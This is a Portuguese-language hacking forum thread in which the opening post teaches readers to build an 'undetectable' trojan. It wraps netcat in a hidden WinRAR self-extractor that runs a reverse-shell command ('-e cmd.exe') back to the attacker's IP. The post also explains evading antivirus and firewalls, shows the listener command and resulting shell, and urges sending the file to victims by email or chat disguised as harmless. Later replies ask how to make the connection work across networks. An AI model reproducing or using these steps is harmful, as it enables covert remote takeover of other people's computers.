Insecuritynet
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

Netcat - Trojan Indetectável

2 participantes

Ir para baixo

Netcat - Trojan Indetectável Empty Netcat - Trojan Indetectável

Mensagem  veronmaiden Sáb Dez 05, 2009 12:20 pm

ai galera quem fala qui é o cavalhe do sistema
ai blz galera
vou falar um pouco sobre netcat que numca ouvio fala sobre ele, pois bem essa ferramenta e muito poderosa para quem ñ sabe vou mostra com fazer um trojan com netcat indetectável blz espero que goste vlw

Com certeza uma das maiores dificuldades de se fazer um ataque por trojan, está na camuflagem do "bixo", pois os anti-vírus estão cada vez mais avançados, tornando a invasão por trojan algo muito difícil...

Pois para camuflar o mesmo teríamos que entender a fundo o a estrutura dos executáveis para Windows, cabeçalhos PE, sem contar com programação em assembly para podermos editar o trojan usando um editores hexadecimais e debuggers, para deixá-lo invisível aos olhos do ainti-vírus, é claro que há exceções que você poderá editar apenas usando um explorador de PE como o ResourceHacker. Então, se você conhece todos os assuntos citados anteriormente, OK você com certeza poderá fazer com que seu trojan passe despercebido pelo anti-vírus, mas... e o Firewall?

Qual será o truque para burla-lo? Bom, acho que já está na hora de te apresentar uma técnica de criação de trojan que faz o mesmo passar despercebido diante destes dois sistemas de proteção, esta técnica consiste em compactar o executável do NetCat (nc.exe) usando o WinRar e usando as opções de SFX do mesmo nos permitirá criar um trojan que faça conexão reversa, indetectável tanto aos olhos do anti-vírus como do firewall, Por que? Isso vou te explicar no decorrer deste artigo, Seja bem vindo!

O que é Conexão Reversa?

A conexão reversa é um tipo de invasão parecida com uma invasão por trojan, só que ao invés de o "cracker" se conectar ao alvo, como é feito tipicamente usando trojans, o alvo é quem se conecta ao hacker, dando-lhe total acesso a máquina invadida e fazendo com que bloqueios como firewalls sejam facilmente burlados e também é muito útil quando se quer invadir um computador que esteja na rede interna, já que a vítima é quem se conecta ao invasor.

Sobre o NetCat

O NetCat que é considerado pelos hackers o canivete suíço do TCP/IP, devido a sua incrível flexibilidade, com o NC(NetCat), podemos fazer desde uma simples conexão a um host até um brute force por wordlist, para quebrar senhas de um determinado serviço.

Sobre o WinRar

WinRAR parece nome de super-herói mas é o nome da versão para Windows do compactador de arquivos RAR.

Por que indetectável?

Primeiro vou explicar por que o trojan criado usando esta técnica é indetectável pelo o anti-vírus depois explico porque o mesmo é indetectável pelo firewall.

Anti-vírus:

Simples, nenhum anti-vírus, (pelo menos os do meu conhecimento) julgam o NetCat e o WinRar como programas nocivos. Por isso quando um anti-vírus faz uma varredura em um trojan feito usando esta técnica, ele só vai encontrar um executável criado pelo WinRar com o NetCat dentro dele compactado, e não vai emitir avisos pois trata-se de um programa inócuo (aos olhos do anti-vírus).

Firewall:

Como este trojan vai usar conexão reversa, nós não vamos ter que nos preocupar com firewalls porque a maioria dos firewall bloqueiam programas que queiram abrir portas, não os que simplesmente querem se conectar a uma determinada porta que já esteja aberta. Resumindo: Os firewalls se preocupam mais em proteger de fora pra dentro do que de dentro pra fora. Não entendeu? Então eu te explico melhor: Se você instala um trojan convencional que tente abrir uma porta na máquina da vítima para que o hacker se conecte, o firewall com certeza vai te bloquear, mas se você envia um trojan que vá se conectar a uma porta já aberta no seu computador (neste caso você é o invasor), dificilmente o firewall vai te bloquear.

Let's go...

Agora que já conhecemos estas duas magníficas ferramentas, vamos ao que realmente interessa, vamos iniciar a criação do nosso trojan, então siga o passo-a-passo abaixo, mas "use com moderação"

Após baixar e descompactar o NetCat, abra a pasta onde você descompactou os arquivos do NetCat e compacte apenas o arquivo nc.exe usando o WinRar.

Abra o Arquivo compactado, clicando duas vezes sobre o mesmo e em seguida clique no botão SFX, e logo após em "Opções Avançadas de SFX".

Agora em Caminho para extração, informe o diretório onde você quer que o arquivo seja extraído, nos meus testes eu coloquei c:\windows\system32. No grupo Configurações do Programa e no campo Executar após a extração informe os seguintes parâmetros:

nc -d 192.168.28.2 1020 -e cmd.exe

isso fará com que o assim que executado o trojan se conecte a você.

Onde o IP (192.168.28.2) deverá ser substituído pelo seu, já que é a vítima que vai se conectar a você, e você também poderá substituir a porta (que está logo após o IP) por outra de sua preferência.

Agora clique na Aba Métodos

No Grupo de opções Método de espera, marque a opção Ocultar tudo, esta opção serve para que o NetCat seja executado em segundo plano, para que o alvo não perceba que está rodando um programa malicioso no seu computador. Logo em seguida no grupo de opções Métodos de Substituição, marque a opção Ignorar arquivos existentes para que o WinRar não nos dedure.

Clique na Aba Texto e ícone e escolha um ícone para o executável do seu trojan, clicando em Procurar.

Finalmente clique em OK nas duas janelas abertas e em seguida feixe o WinRar e Pronto! O seu trojan indetectável já está pronto, agora no seu computador vamos configurar o NetCat para que ele fique escutando em uma determinada porta (nos meus testes ou configurei a porta 1020). Veja abaixo como fazer isto:

Copei o arquivo nc.exe para a pasta c:\windows\system32

Vá no menu Iniciar >> Executar >> Digite "cmd" (sem as aspas)

E agora vamos deixar o NetCat na escuta na porta 1020 (lembre-se que tem que ser a que você configurou quando criava o trojan). No prompt de comando digite:

nc -l -n -p 2525 -vv

Em seguida ele ficará assim:

C:\Documents and Settings\Lord Dexter\Desktop\nc111nt>nc -l -n -p 1020 -vv
listening on any 1020 ...

O NetCat já está na escuta, apenas esperando pela conexão do seu alvo. Agora só te resta enviar o trojan para o seu alvo por eMail, Chat, etc, como se fosse algo inofensivo e esperar que ele o execute, pois no mesmo instante em que o trojan é executado ele se conectará instantaneamente a você te dando de presente um belo Shell, como o da representação abaixo:

C:\Documents and Settings\Lord Dexter\Desktop\nc111nt>nc -l -n -p 1020 -vv
listening on any 1020 ...
connect to [192.168.25.8] from (UNKNOWN) [127.0.0.1] 5402
Microsoft Windows XP versão 5.1.2600
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>_

É isso ai galera,termina aqui,podem comentar o que acharam
desse tutorial.

veronmaiden

Mensagens : 70
Data de inscrição : 02/08/2009

http://www.insecuritynet.com

Ir para o topo Ir para baixo

Netcat - Trojan Indetectável Empty ME ajuda PLZ o meu NC.. eu mando e ñ conecta

Mensagem  Rôney Sáb Nov 27, 2010 8:51 pm

è assim
eu mando para a pessoa... Programo td COloco o meu IP a porta "1020"
Dexo o meu "nc" em modo d espera mais ele não conecta... Ele conecta somente Do meu propio PC no meu propio PC.. Entendeu?
Resumindo
ele so conecta c estiver na mesma rede EU axu... OQ eu faço?

Email:
roney.Fischer@yahoo.com

Rôney
Convidado


Ir para o topo Ir para baixo

Netcat - Trojan Indetectável Empty Re: Netcat - Trojan Indetectável

Mensagem  h_ Seg Nov 29, 2010 6:24 pm

Abre a porta em seu modem

h_
Convidado


Ir para o topo Ir para baixo

Netcat - Trojan Indetectável Empty Re: Netcat - Trojan Indetectável

Mensagem  PHDRYAN Seg Out 10, 2011 5:37 pm

mano é o seguinte no final da como nao reconhecece o comando no cdm

PHDRYAN

Mensagens : 1
Data de inscrição : 10/10/2011

Ir para o topo Ir para baixo

Netcat - Trojan Indetectável Empty Re: Netcat - Trojan Indetectável

Mensagem  Conteúdo patrocinado


Conteúdo patrocinado


Ir para o topo Ir para baixo

Ir para o topo

- Tópicos semelhantes

 
Permissões neste sub-fórum
Não podes responder a tópicos